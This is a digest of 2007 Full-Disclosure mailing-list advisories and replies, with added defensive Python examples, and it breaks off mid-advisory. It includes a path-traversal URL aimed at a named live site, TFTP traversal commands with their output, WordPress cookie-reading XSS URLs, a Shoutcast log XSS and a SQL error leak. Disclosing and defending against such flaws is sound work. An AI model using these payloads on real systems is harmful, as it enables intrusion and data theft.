Re: [Full-disclosure] Extracting files from SMB packet captures
While I haven't done anything specifically with SMB, I did come up with the following a few years back; it might prove useful in your research:

http://www.adminprep.com/articles/default.asp?action=show&articleid=52

It covers taking an ethereal data cap, and taking portions of it to come up with the original content, i.e. .wav's, .mov's, .zip's, .jpg's, etc. You get the idea.

If you have any sanitized caps you want to send my way, I'd be happy to play around with them, as well.

Mike

On 2/26/07, Jim O'Gorman [EMAIL PROTECTED] wrote:
> I have been working with extracting files from full-content SMB packet captures. I would like to compare what I have found with other sources to see how right/wrong I am about a few things.
>
> Does anyone have good sources of examples on pulling files out of SMB packet captures I can use as a reference? Tools or write ups would be great.
>
> Thanks
> Jim

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke
[EMAIL PROTECTED] wrote:
> SEC Consult Security Advisory 20070226-0
> ===
> title: File Disclosure in Pagesetter for PostNuke
> program: Pagesetter page creation module
> vulnerable version: 6.2.0 6.3.0 beta 5
> impact: high
> homepage: http://www.elfisk.dk
> found: 2006-11-21
> by: D. Matscheko / SEC-CONSULT / www.sec-consult.com
> ===
>
> vendor description:
> ---
> Pagesetter is a publishing module that allows the PostNuke users to create web pages from structured data, with the data structure and output templates defined by the PostNuke administrator.
> [Source: http://www.elfisk.dk]

I think brendanb's going to be busy.

http://www.nesco.com.au/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00
[Full-disclosure] Kiwi CatTools TFTP server path traversal
Path traversal security vulnerability in Kiwi CatTools TFTP server up to 3.2.8 can lead to information disclosure and remote code execution

Risk: High

DISCUSSION

Kiwi CatTools TFTP server doesn't properly verify the filename in PUT and GET requests, which can be used to download/upload any file from/to the server. The default setting allows replacing of existing files. Such settings lead to the possibility of replacing executable files and running code of the attacker's choice.

EXAMPLES

C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt
Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>type boot.txt
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt
Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>type pttest.txt
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>

SOLUTION

Upgrade to CatTools 3.2.9 which is available for download at http://www.kiwisyslog.com/downloads.php

CREDITS

Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)

DISCLOSURE TIMELINE

Vulnerability discovered: 11/20/2006
Initial vendor contact: 12/08/2006
Patch released: 02/13/2007
Public disclosure: 02/27/2007
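Both this advisory and the SEC Consult Pagesetter advisory above come down to the same missing check: a client-supplied name is joined onto a base directory without rejecting `..` components (and, in the Pagesetter case, a `%00` NUL byte). The following is an added example of the server-side check a file-serving daemon should apply, not code from either advisory or from the products they describe. It assumes the service may only serve files under one directory (`ROOT`, a constructed value) and receives the name as a string; the request strings it is exercised with are the ones quoted in the two advisories.

```python
"""Server-side filename validation for a file-serving daemon (TFTP GET/PUT,
download-by-id web handlers and the like).

Added example, not code from the Kiwi CatTools or Pagesetter advisories or
from those products. ROOT is a constructed directory name.
"""
import os
import posixpath

ROOT = "/srv/tftp"  # constructed: the only directory the service may serve from


class UnsafePath(ValueError):
    """Raised for names that must not be mapped onto the filesystem."""


def resolve_under_root(root, requested):
    """Map a client-supplied name to an absolute path inside `root`, or raise UnsafePath.

    Rejects NUL bytes (the %00 in the Pagesetter request would truncate the
    name in C-level APIs), honours no absolute names, and refuses anything
    whose normalised form escapes the root (the /x/../../../.. pattern from
    the TFTP examples).
    """
    if "\x00" in requested:
        raise UnsafePath("NUL byte in filename")
    # Windows TFTP clients send backslashes; treat both as separators.
    name = requested.replace("\\", "/")
    # A leading slash is never honoured: every name is relative to root.
    name = name.lstrip("/")
    # First a lexical check on '..' components...
    norm = posixpath.normpath(name)
    if norm in ("", ".", "..") or norm.startswith("../"):
        raise UnsafePath("path escapes root")
    # ...then a filesystem check, so a symlink inside root that points
    # outside of it is caught as well.
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, norm))
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise UnsafePath("path escapes root")
    return candidate


def is_allowed(root, requested):
    """Boolean form of the check, convenient for request handlers."""
    try:
        resolve_under_root(root, requested)
        return True
    except UnsafePath:
        return False


if __name__ == "__main__":
    # Request strings from the two advisories plus one legitimate name.
    for req in ("/x/../../../../../boot.ini",
                "../../../../../../../../../etc/passwd\x00",
                "configs/router1.cfg"):
        verdict = "allowed" if is_allowed(ROOT, req) else "REJECTED"
        print(f"{req!r:48} -> {verdict}")
```

The lexical `normpath` test alone is not enough on a real filesystem, which is why the resolved path is compared against the resolved root a second time; the two checks together cover both `..` in the request and symlinks already present under the served directory.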
[Full-disclosure] Multiple SQL Injection bugs in TCS website
Hello list,

The website of TCS (Tata Consultancy Services) is prone to multiple SQL injection bugs. I already sent them an email back in December 2006. They have not fixed the bug just yet, so I am going to disclose the details here.

http://kishfellow.blogspot.com

The scripts are prone to multiple XSS and SQL bugs. A sample screenshot for a potential SQL injection is given in my blog.

Cheers :)
Kish

Full-Disclosure - We believe in it !
Remember there is alwayz someone who knows more than us out there
Re: [Full-disclosure] Extracting files from SMB packet captures
Not SMB specific, however it should do the job.

http://tcpxtract.sourceforge.net/

Regards,
ZQ
Re: [Full-disclosure] Extracting files from SMB packet captures
Jim O'Gorman wrote:
> Does anyone have good sources of examples on pulling files out of SMB packet captures I can use as a reference? Tools or write ups would be great.

search for smbspy

http://www.google.com/search?q=smbspy

/rl
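The three replies in this thread all point at the same technique: once the TCP payloads of a capture are reassembled in stream order, files can be recovered by scanning for known header/trailer signatures, which is what tcpxtract and the linked adminprep article do. The block below is an added example of that carving step; it is not code from the article, tcpxtract or smbspy. It assumes the reassembly has already been done and works on one byte string; the sample stream (a fake JPEG and a real in-memory ZIP wrapped in filler bytes) is constructed inline so it runs offline.

```python
"""Magic-byte file carving over a reassembled packet payload stream.

Added example for this thread, not code from the linked article or from
tcpxtract/smbspy. Input is assumed to be the capture's TCP payloads already
reassembled into one byte string; the sample stream is constructed here.
"""
import io
import zipfile

# kind -> (header, trailer, bytes after the trailer that still belong to the file).
# A ZIP ends with an End Of Central Directory record: 'PK\x05\x06' followed by
# 18 bytes (disk numbers, entry counts, directory size/offset, comment length)
# when the archive carries no comment.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9", 0),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82", 0),
    "zip": (b"PK\x03\x04", b"PK\x05\x06", 18),
}
MAX_FILE = 64 * 1024 * 1024  # stop looking for a trailer beyond this window


def carve(stream, max_file=MAX_FILE):
    """Return [(kind, offset, payload), ...] for every header/trailer pair found."""
    found = []
    for kind, (head, tail, extra) in SIGNATURES.items():
        pos = 0
        while True:
            start = stream.find(head, pos)
            if start < 0:
                break
            end = stream.find(tail, start + len(head), start + max_file)
            if end < 0:
                # header with no trailer in range (truncated transfer): skip it
                pos = start + 1
                continue
            stop = end + len(tail) + extra
            found.append((kind, start, stream[start:stop]))
            pos = stop
    found.sort(key=lambda hit: hit[1])
    return found


def build_sample_stream():
    """Constructed sample input: filler + fake JPEG + filler + real ZIP + filler.

    Returns (stream, fake_jpeg, real_zip) so callers can compare carved output.
    """
    fake_jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x11" * 32 + b"\xff\xd9"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        # fixed timestamp so the archive bytes are deterministic
        info = zipfile.ZipInfo("note.txt", date_time=(2007, 2, 27, 0, 0, 0))
        zf.writestr(info, b"hello")
    real_zip = buf.getvalue()
    filler = b"\xffSMB" + b"\x00" * 28  # stands in for SMB headers around the data
    return filler + fake_jpeg + filler + real_zip + filler, fake_jpeg, real_zip


def read_zip_member(payload, name):
    """Open a carved ZIP payload and return one member's bytes (proves the carve is intact)."""
    with zipfile.ZipFile(io.BytesIO(payload)) as zf:
        return zf.read(name)


if __name__ == "__main__":
    stream, _, _ = build_sample_stream()
    for kind, offset, payload in carve(stream):
        print(f"{kind} at offset {offset}: {len(payload)} bytes")
```

Carving on signatures alone has the limitation the thread is really about: it recovers nothing from a transfer whose trailer never arrived, and it knows nothing about which SMB file name the bytes belonged to. For that, the SMB-level parsing Jim is asking about is needed on top.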
Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)
On Tue, 27 Feb 2007, Richard Moore wrote:
> <html><body onunload="location = self.location"><a href="http://slashdot.org/">http://slashdot.org/</a></body></html>

Yeah, and the other way round: http://lcamtuf.coredump.cx/ietrap/, when used with FF 2.0.0.2, puts you on a page that:

1) Has URL bar data and favicon from the target site,
2) Views source of what you added with document.write(),
3) Displays as blank.

Moreover, repeatedly setting document.location = xxx; on departure may land you at slashdot.org/xxx instead (meaning the update is being performed in the context of the new page).

Although this looks like a Really Bad Thing (tm), I didn't succeed in modifying /ietrap/ to display a malicious payload (though it feels like it's sooo close), nor in manipulating DOM in the latter example to do anything other than annoying the user (because 2.0.0.1 kept crashing ;-). Still, I'm not gonna sleep well until this is fixed.

/mz
Re: [Full-disclosure] Kiwi CatTools TFTP server path traversal
Probably it's the same or a related issue to the one reported by nicob at nicob.net.

http://securityvulns.com/news/KIWI/CatTools/DT.html
CVE-2007-0888

--Wednesday, February 28, 2007, 12:47:17 AM, you wrote to bugtraq@securityfocus.com:

> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8 server can lead to information disclosure and remote code execution
>
> Risk: High
>
> DISCUSSION
>
> Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET request which can be used to download/upload any file from/to server. Default setting allows replacing of existing files. Such settings lead to probability to replace an executable files and run code on attacker choice.
>
> EXAMPLES
>
> C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt
> Transfer successful: 212 bytes in 1 second, 212 bytes/s
>
> C:\>type boot.txt
> [boot loader]
> timeout=30
> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
>
> C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt
> Transfer successful: 212 bytes in 1 second, 212 bytes/s
>
> C:\>type pttest.txt
> [boot loader]
> timeout=30
> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
>
> C:\>
>
> SOLUTION
>
> Upgrade to CatTools 3.2.9 which is available for download at
> http://www.kiwisyslog.com/downloads.php
>
> CREDITS
>
> Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)
>
> DISCLOSURE TIMELINE
>
> Vulnerability discovered: 11/20/2006
> Initial vendor contact: 12/08/2006
> Patch released: 02/13/2007
> Public disclosure: 02/27/2007

--
~/ZARAZA
http://securityvulns.com/
As long as you are in the hands of providence, you will not manage to die before your time. (Twain)
[Full-disclosure] [ GLSA 200702-11 ] MPlayer: Buffer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200702-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: MPlayer: Buffer overflow
      Date: February 27, 2007
      Bugs: #159727
        ID: 200702-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow was found in MPlayer's RTSP plugin that could lead to
a Denial of Service or arbitrary code execution.

Background
==========

MPlayer is a media player capable of playing multiple media formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  media-video/mplayer          < 1.0_rc1-r2            >= 1.0_rc1-r2

Description
===========

When checking for matching asm rules in the asmrp.c code, the results
are stored in a fixed-size array without boundary checks, which may
allow a buffer overflow.

Impact
======

An attacker can entice a user to connect to a manipulated RTSP server,
resulting in a Denial of Service and possibly execution of arbitrary
code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MPlayer users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/mplayer-1.0_rc1-r2"

References
==========

  [ 1 ] Original Advisory
        http://www.mplayerhq.hu/design7/news.html#vuln14
  [ 2 ] CVE-2006-6172
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200702-11.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[Full-disclosure] [ GLSA 200702-12 ] CHMlib: User-assisted remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200702-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: CHMlib: User-assisted remote execution of arbitrary code
      Date: February 27, 2007
      Bugs: #163989
        ID: 200702-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A memory corruption vulnerability in CHMlib could lead to the remote
execution of arbitrary code.

Background
==========

CHMlib is a library for the MS CHM (Compressed HTML) file format plus
extracting and HTTP server utils.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  app-doc/chmlib                    < 0.39                   >= 0.39

Description
===========

When certain CHM files that contain tables and objects stored in pages
are parsed by CHMlib, an unsanitized value is passed to the alloca()
function, resulting in a shift of the stack pointer to arbitrary memory
locations.

Impact
======

An attacker could entice a user to open a specially crafted CHM file,
resulting in the execution of arbitrary code with the permissions of
the user viewing the file.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All CHMlib users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-doc/chmlib-0.39"

References
==========

  [ 1 ] Original Advisory
        http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=468
  [ 2 ] CVE-2007-0619
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0619

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200702-12.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)
Resent as I realised I'm not subscribed here

Michal Zalewski wrote:
> I can't really comment on whether this fixes the problem once and for all, because I haven't really examined the changes implemented for 364692, but yeah, my example no longer crashes the browser for me.

I think there are still underlying problems in the code as the following illustrates:

1. Put this in a web page, then view it in firefox.

<html><body onunload="location = self.location"><a href="http://slashdot.org/">http://slashdot.org/</a></body></html>

2. Click on the link which should take you to slashdot and you'll end up back where you were (this has been known about for ages).

3. Now do 'View Source' and you get shown the source code to slashdot rather than the source code for the page you're viewing.

Actual Results: View source displays the contents of the wrong site

Expected Results: I'd expect to see the source code for the page I'm viewing.

A web page could trigger the link itself using DOM events (or navigate away using javascript form submission) and use this technique to hide the source code of a malicious page from the user. I did a quick check that document.cookie wasn't checking the wrong URL, but I have not checked extensively which other parts of the browser can be spoofed in this fashion.

I reported this via bugzilla, but it was closed as a duplicate of bug 253497 which was reported in 2004.

Cheers

Rich.
--
Richard Moore, Principal Software Engineer, Westpoint Ltd,
Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England
Tel: +44 161 237 1028
Fax: +44 161 237 1031
[Full-disclosure] Disabling Google Desktop Link Integration In Google Pages
GDS Desktop Link and Google.com Integration - Bad Design or Necessary Evil?

The recent security advisory on Google Desktop Search (GDS) published by Watchfire did not really surprise me, as I was expecting more like this in the past 2 years. However, the fact that intrigued me to write this article is that Google has not yet bothered to provide its GDS tool users the option to disable the GDS desktop link, regardless of knowing this design will attract more attacks in future as well.

In this article, I'll discuss a bit about why the GDS issues revolve primarily around the GDS Desktop link and how one can fix it permanently by disabling it, which will ensure that users can still use GDS without the fear of exploits that are targeted towards the desktop link.

Get the entire article here - Disabling GDS Desktop Link Integration In Google Pages

http://hackingspirits.com/vuln-rnd/vuln-rnd.html

Regards,
-d (aka T)
[Full-disclosure] Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities

scip AG Vulnerability ID 2962 (02/27/2007)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962

I. INTRODUCTION

WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. More information is available on the project web site at the following URL:

http://www.wordpress.org

II. DESCRIPTION

Stefan Friedli found several vulnerabilities based on an advisory entitled "WordPress AdminPanel CSRF/XSS - 0day" by Samenspender, which described a lack of input validation when deleting posts that allows injection of arbitrary code. The vulnerability was reported on February 26th and is referenced in section VII.

Further to this vulnerability, which was limited to manipulating the post parameter, there are several other vulnerabilities which are very similar to the one mentioned above. Every operation that makes use of the common confirm dialog is vulnerable to this type of attack.

Possible injection...

... when deleting posts as mentioned in Samenspender's advisory (unvalidated parameter: post, file: post.php)
http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting pages (unvalidated parameter: page, file: page.php)
http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting categories (unvalidated parameter: cat_ID, file: categories.php)
http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

IV. IMPACT

This list may not be exhaustive. It illustrates that the flaw with confirmation dialogs in Wordpress is not limited to the "Delete Post" function. Fixing the validation of the post parameter as suggested by e.g. Secunia does not fix the problem and does not reduce the threat of cross-site scripting or any other web-based exploitation.

V. DETECTION

These flaws can be detected by using any web browser.

VI. SOLUTION

Until these issues are patched, possible workarounds are manual fixing or the usage of an application level filter like mod_security for Apache.

VII. SOURCES

Samenspender - WordPress AdminPanel CSRF/XSS - 0day
http://seclists.org/bugtraq/2007/Feb/0494.html

scip AG - Security Consulting Information Process (german)
http://www.scip.ch

scip AG Vulnerability Database (german)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962

IX. DISCLOSURE TIMELINE

02/26/06 Release of Delete Post-Confirmation Vulnerability
02/27/06 Identification of further vulnerabilities
02/27/06 Immediate Release for informational purposes

IX. CREDITS

The vulnerabilities were discovered by Stefan Friedli.

Stefan Friedli, scip AG, Zuerich, Switzerland
stfr-at-scip.ch
http://www.scip.ch

A2. LEGAL NOTICES

Copyright (c) 2007 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.0.6

iQA/AwUBReRJv1J79Mw3xa1EEQJXagCdHOT7ib4I8XSqMsaUAKA8vaO8i8QAn2SS
oTWNsT+cOMwFq+XKsZqq6yJ/
=REO6
-----END PGP SIGNATURE-----
[Full-disclosure] WordPress Search Function SQL-Injection
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+-----------------------------------------------
| SaMuschie Research Labs proudly presents . . .
+-----------------------------------------------
| Application:            wordpress
| Version:                <= 2.1.1
| Vuln./Exploit Type:     SQL-Injection
| Status:                 0day
+-----------------------------------------------
| Discovered by:          Samenspender
| Released:               20070227
| SaMuschie Release Number: 2
+-----------------------------------------------

Searching for a single ,,comma,, generates a sql error message.

e.g.: http://wordpress-deutschland.org/?s=,

results in:

WordPress Datenbank-Fehler: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND (post_type = 'post' AND (post_status = 'publish')) ORDER BY post_date DE' at line 1]
SELECT SQL_CALC_FOUND_ROWS wpdorg_posts.* FROM wpdorg_posts WHERE 1=1 AND () AND (post_type = 'post' AND (post_status = 'publish')) ORDER BY post_date DESC LIMIT 0, 10

+-----------------------------------------------
| Lameness Disclaimer
+-----------------------------------------------
| SaMuschie Research Labs was found to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
|
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of
| this advisory are requested not to ask any questions
| to the researchers they don't know the answer ;)
+-----------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF5GSdMFgfGpQK8VERAvOWAJwLms5H6b4So3tO19lc3eHMGeNvLwCdHAP8
ZfylSi7g8HINHkpBYzYgUqE=
=fBdH
-----END PGP SIGNATURE-----
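The error text quoted above is informative on its own: the generated statement reads `WHERE 1=1 AND () AND ...`, so the search term list came out empty for a bare comma and the SQL was still assembled by string concatenation around it. The block below is an added example of a search-query builder that avoids both halves of that problem; it is not WordPress code. It binds every term as a parameter, escapes LIKE wildcards, and simply omits the clause when there are no terms, so the ',' case produces a valid query. The table layout and sample rows are constructed, and SQLite stands in for MySQL.

```python
"""Parameterised search-query builder that handles the empty-term case.

Added example, not WordPress code. Table layout and rows are constructed;
SQLite stands in for MySQL.
"""
import re
import sqlite3


def split_terms(search):
    """Split on whitespace and commas, dropping empty pieces (the ',' case)."""
    return [t for t in re.split(r"[\s,]+", search) if t]


def build_search_query(search, limit=10):
    """Return (sql, params). Terms never touch the SQL text, only the parameter list."""
    sql = ("SELECT id, post_title FROM posts "
           "WHERE post_type = 'post' AND post_status = 'publish'")
    params = []
    terms = split_terms(search)
    if terms:
        clauses = []
        for term in terms:
            # escape LIKE wildcards so a user cannot widen the match with % or _
            pattern = "%" + (term.replace("\\", "\\\\")
                                 .replace("%", r"\%")
                                 .replace("_", r"\_")) + "%"
            clauses.append("(post_title LIKE ? ESCAPE '\\' "
                           "OR post_content LIKE ? ESCAPE '\\')")
            params.extend([pattern, pattern])
        sql += " AND (" + " AND ".join(clauses) + ")"
    # no terms: no clause at all, instead of the 'AND ()' seen in the advisory
    sql += " ORDER BY post_date DESC LIMIT ?"
    params.append(int(limit))
    return sql, params


def make_demo_db():
    """Constructed in-memory table with two published posts and one draft."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, post_title TEXT, "
                "post_content TEXT, post_type TEXT, post_status TEXT, post_date TEXT)")
    con.executemany("INSERT INTO posts VALUES (?, ?, ?, ?, ?, ?)", [
        (1, "Hello world", "first post", "post", "publish", "2007-02-26 10:00:00"),
        (2, "Kiwi CatTools traversal", "tftp path check", "post", "publish", "2007-02-27 09:00:00"),
        (3, "Unfinished draft", "not public", "post", "draft", "2007-02-27 11:00:00"),
    ])
    return con


def search_titles(con, search, limit=10):
    """Run the built query and return matching titles, newest first."""
    sql, params = build_search_query(search, limit)
    return [row[1] for row in con.execute(sql, params)]


if __name__ == "__main__":
    db = make_demo_db()
    for s in (",", "kiwi", "' OR 1=1 --", "100%"):
        print(f"{s!r:15} -> {search_titles(db, s)}")
```

With the terms bound as parameters, a quote or comment sequence in the search string is just characters to match against, which is also what makes the degenerate input harmless rather than an error page that leaks table and column names.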
[Full-disclosure] Nullsoft ShoutcastServer Persistent XSS - 0day
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+-----------------------------------------------
| SaMuschie Research Labs proudly presents . . .
+-----------------------------------------------
| Application:            Nullsoft ShoutcastServer
| Version:                1.9.7/Win32 (other versions/platforms not tested)
| Vuln./Exploit Type:     Persistent XSS
| Status:                 -0day
+-----------------------------------------------
| Discovered by:          Muschiemann
| Released:               20070227
| SaMuschie Release Number: 3
+-----------------------------------------------

It is possible to inject script code into the application's logfile without authentication. Once the admin is viewing the logfile via the web interface, the script code will be executed.

e.g.:

http://victim:8001/<script>alert(document.getElementsByTagName(PRE)[0].firstChild.data)</script>

By abusing this vuln it is possible to send the complete logfile to an evil host.

+-----------------------------------------------
| Lameness Disclaimer
+-----------------------------------------------
| SaMuschie Research Labs was found to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
|
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of
| this advisory are requested not to ask any questions
| to the researchers they don't know the answer ;)
+-----------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32)

iD8DBQFF5H4RCrtcl+ifKZARAsHoAJ9xBhoq8tuX/I5mPU1OjmJbRJSPggCfTNFj
8kqRWw8smOdqvIoKPWTuZuA=
=oALk
-----END PGP SIGNATURE-----
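This advisory and the scip WordPress advisory above show the same bug in two output contexts: a request value dropped into an HTML attribute (the WordPress `post`, `c`, `page` and `cat_ID` parameters) and a request line copied from a log into a `<pre>` block (the Shoutcast log viewer). The block below is an added example of the encoding and type checks that close both; it is not WordPress's or Nullsoft's code, and the two HTML skeletons are assumptions that imitate the patterns, not the real templates. The payload string is the one from the WordPress advisory, URL-decoded; the log lines are constructed.

```python
"""Output encoding for values reflected into an attribute and into a <pre> log view.

Added example, not WordPress or Nullsoft code. HTML skeletons, the log line
format and SAMPLE_LOG are constructed.
"""
import html
import re

# Injection string from the WordPress advisory (URL-decoded).
WP_PAYLOAD = "'><script>alert(document.cookie)</script>"


def confirm_link_unsafe(action, post_id):
    """Pattern the advisory describes: the raw value lands inside a single-quoted attribute."""
    return f"<a href='post.php?action={action}&post={post_id}'>Yes</a>"


def confirm_link_safe(action, post_id):
    """Validate the identifier's type, then encode it for the attribute context anyway."""
    post_id = str(post_id)
    if not re.fullmatch(r"[0-9]{1,10}", post_id):
        raise ValueError("post id must be a decimal integer")
    if action not in ("delete", "deletecomment"):
        raise ValueError("unknown action")
    # quote=True turns both ' and " into entities, so the value can never
    # close the attribute it is placed in.
    return '<a href="post.php?action={}&amp;post={}">Yes</a>'.format(
        html.escape(action, quote=True), html.escape(post_id, quote=True))


def confirm_link_accepts(action, post_id):
    """True if the safe builder would emit a link for this input."""
    try:
        confirm_link_safe(action, post_id)
        return True
    except ValueError:
        return False


def render_log_unsafe(lines):
    """Log viewer that trusts its own log: whatever a client sent is emitted as markup."""
    return "<pre>" + "\n".join(lines) + "</pre>"


def render_log_safe(lines):
    """Escape every line and neutralise control characters before the browser sees it."""
    cleaned = []
    for line in lines:
        line = re.sub(r"[\x00-\x08\x0b-\x1f\x7f]", "?", line)
        cleaned.append(html.escape(line, quote=True))
    return "<pre>" + "\n".join(cleaned) + "</pre>"


def contains_script_tag(markup):
    """True if the rendered HTML still carries a live <script> element."""
    return re.search(r"<script\b", markup, re.IGNORECASE) is not None


# Constructed log lines; the second is a request of the kind the advisory shows.
SAMPLE_LOG = [
    "<02/27/07@22:10:01> [dest: 10.0.0.5] starting stream (UID: 1)",
    '<02/27/07@22:10:05> [src: 10.0.0.9] GET /<script>alert("x")</script> HTTP/1.0',
]

if __name__ == "__main__":
    print(confirm_link_unsafe("delete", WP_PAYLOAD))
    print(confirm_link_safe("delete", "42"))
    print(render_log_safe(SAMPLE_LOG))
```

The type check on `post_id` is what Secunia's suggested fix amounts to; the scip advisory's point is that it must be applied to every parameter that reaches the confirm dialog, and encoding at the output site is what makes a missed parameter harmless.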
[Full-disclosure] iDefense Security Advisory 02.27.07: Computer Associates eTrust Intrusion Detection Denial of Service Vulnerability
Computer Associates eTrust Intrusion Detection Denial of Service Vulnerability

iDefense Security Advisory 02.27.07
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 27, 2007

I. BACKGROUND

Computer Associates eTrust Intrusion Detection is a network intrusion management and prevention system that includes real-time session monitoring and Internet web filtering capabilities. More information can be found on the vendor's site at the following URL.

http://www3.ca.com/solutions/Product.aspx?ID=163

II. DESCRIPTION

The eTrust Intrusion Detection process listens on TCP port 9191 for remote administration functions. Administrator login requires that keys be exchanged, including a session key with blowfish encryption of the login and the password.

Since the administration server fails to properly validate the key length value, it is possible to cause the product to crash. During decryption, 4 is subtracted from the specified length and the result used as the length of the data to decrypt. The decryption loop will proceed to overwrite the entire heap segment. This leads to an unhandled exception.

III. ANALYSIS

Exploitation of this vulnerability allows attackers to cause the administration service to crash. Since the heap is not used once corrupted, the heap overflow cannot be exploited for more than a denial of service.

IV. DETECTION

